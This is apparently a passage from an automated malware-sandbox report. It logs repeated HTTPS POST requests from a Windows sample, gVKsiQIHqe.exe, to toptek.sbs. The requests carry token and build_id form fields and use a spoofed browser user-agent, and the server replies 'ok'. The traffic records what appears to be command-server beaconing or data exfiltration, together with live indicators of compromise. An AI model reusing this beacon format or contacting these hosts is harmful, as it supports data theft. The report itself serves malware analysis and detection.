                                                                                                                                                                                                                                                                                    2024-12-23 05:58:26 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 32 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 32 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 32 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------2DTJEUS2DTRQQIMOZMYMContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------2DTJEUS2DTRQQIMOZMYMContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------2DTJEUS2DTRQQIMOZMYMCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:27 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:27 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:27 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    54192.168.2.54999794.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:27 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----ASR16FCT00ZMYMO8GV3O
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1841
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:27 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 41 53 52 31 36 46 43 54 30 30 5a 4d 59 4d 4f 38 47 56 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 41 53 52 31 36 46 43 54 30 30 5a 4d 59 4d 4f 38 47 56 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 41 53 52 31 36 46 43 54 30 30 5a 4d 59 4d 4f 38 47 56 33 4f 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------ASR16FCT00ZMYMO8GV3OContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------ASR16FCT00ZMYMO8GV3OContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------ASR16FCT00ZMYMO8GV3OCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:28 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:28 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:28 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    55192.168.2.55000394.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:29 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----6PHDT26XT2VAAAAAAAIM
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1837
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:29 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 36 50 48 44 54 32 36 58 54 32 56 41 41 41 41 41 41 41 49 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 36 50 48 44 54 32 36 58 54 32 56 41 41 41 41 41 41 41 49 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 36 50 48 44 54 32 36 58 54 32 56 41 41 41 41 41 41 41 49 4d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------6PHDT26XT2VAAAAAAAIMContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------6PHDT26XT2VAAAAAAAIMContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------6PHDT26XT2VAAAAAAAIMCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:30 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:30 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:30 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    56192.168.2.55000694.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:30 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----6PHDT26XT2VAAAAAAAIM
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1841
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:30 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 36 50 48 44 54 32 36 58 54 32 56 41 41 41 41 41 41 41 49 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 36 50 48 44 54 32 36 58 54 32 56 41 41 41 41 41 41 41 49 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 36 50 48 44 54 32 36 58 54 32 56 41 41 41 41 41 41 41 49 4d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------6PHDT26XT2VAAAAAAAIMContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------6PHDT26XT2VAAAAAAAIMContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------6PHDT26XT2VAAAAAAAIMCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:31 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:31 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:31 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    57192.168.2.55001194.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:32 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----L6XBA1NYM7G47Q9000R1
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1837
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:32 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 4c 36 58 42 41 31 4e 59 4d 37 47 34 37 51 39 30 30 30 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 42 41 31 4e 59 4d 37 47 34 37 51 39 30 30 30 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 42 41 31 4e 59 4d 37 47 34 37 51 39 30 30 30 52 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------L6XBA1NYM7G47Q9000R1Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------L6XBA1NYM7G47Q9000R1Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------L6XBA1NYM7G47Q9000R1Cont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:33 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:33 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:33 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    58192.168.2.55001594.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:33 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----L6XBA1NYM7G47Q9000R1
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1825
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:33 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 4c 36 58 42 41 31 4e 59 4d 37 47 34 37 51 39 30 30 30 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 42 41 31 4e 59 4d 37 47 34 37 51 39 30 30 30 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 42 41 31 4e 59 4d 37 47 34 37 51 39 30 30 30 52 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------L6XBA1NYM7G47Q9000R1Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------L6XBA1NYM7G47Q9000R1Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------L6XBA1NYM7G47Q9000R1Cont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:34 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:34 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:34 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    59192.168.2.55002194.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:35 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----US0HLXBAAI5FU3WT000R
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1825
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:35 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 55 53 30 48 4c 58 42 41 41 49 35 46 55 33 57 54 30 30 30 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 55 53 30 48 4c 58 42 41 41 49 35 46 55 33 57 54 30 30 30 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 55 53 30 48 4c 58 42 41 41 49 35 46 55 33 57 54 30 30 30 52 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------US0HLXBAAI5FU3WT000RContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------US0HLXBAAI5FU3WT000RContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------US0HLXBAAI5FU3WT000RCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:36 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:36 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:36 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    60192.168.2.55002294.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:36 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----J5PP8Q9ZUA1NYMY5FCTR
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1837
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:36 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 35 50 50 38 51 39 5a 55 41 31 4e 59 4d 59 35 46 43 54 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 35 50 50 38 51 39 5a 55 41 31 4e 59 4d 59 35 46 43 54 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 35 50 50 38 51 39 5a 55 41 31 4e 59 4d 59 35 46 43 54 52 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------J5PP8Q9ZUA1NYMY5FCTRContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------J5PP8Q9ZUA1NYMY5FCTRContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------J5PP8Q9ZUA1NYMY5FCTRCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:37 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:37 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:37 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    61192.168.2.55002894.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:38 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----Z5P8GDTJM7G4E3O8Q1DB
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1837
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:38 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 35 50 38 47 44 54 4a 4d 37 47 34 45 33 4f 38 51 31 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 50 38 47 44 54 4a 4d 37 47 34 45 33 4f 38 51 31 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 50 38 47 44 54 4a 4d 37 47 34 45 33 4f 38 51 31 44 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------Z5P8GDTJM7G4E3O8Q1DBContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------Z5P8GDTJM7G4E3O8Q1DBContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------Z5P8GDTJM7G4E3O8Q1DBCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:39 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:39 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:39 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    62192.168.2.55003494.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:39 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----Z5P8GDTJM7G4E3O8Q1DB
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1841
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
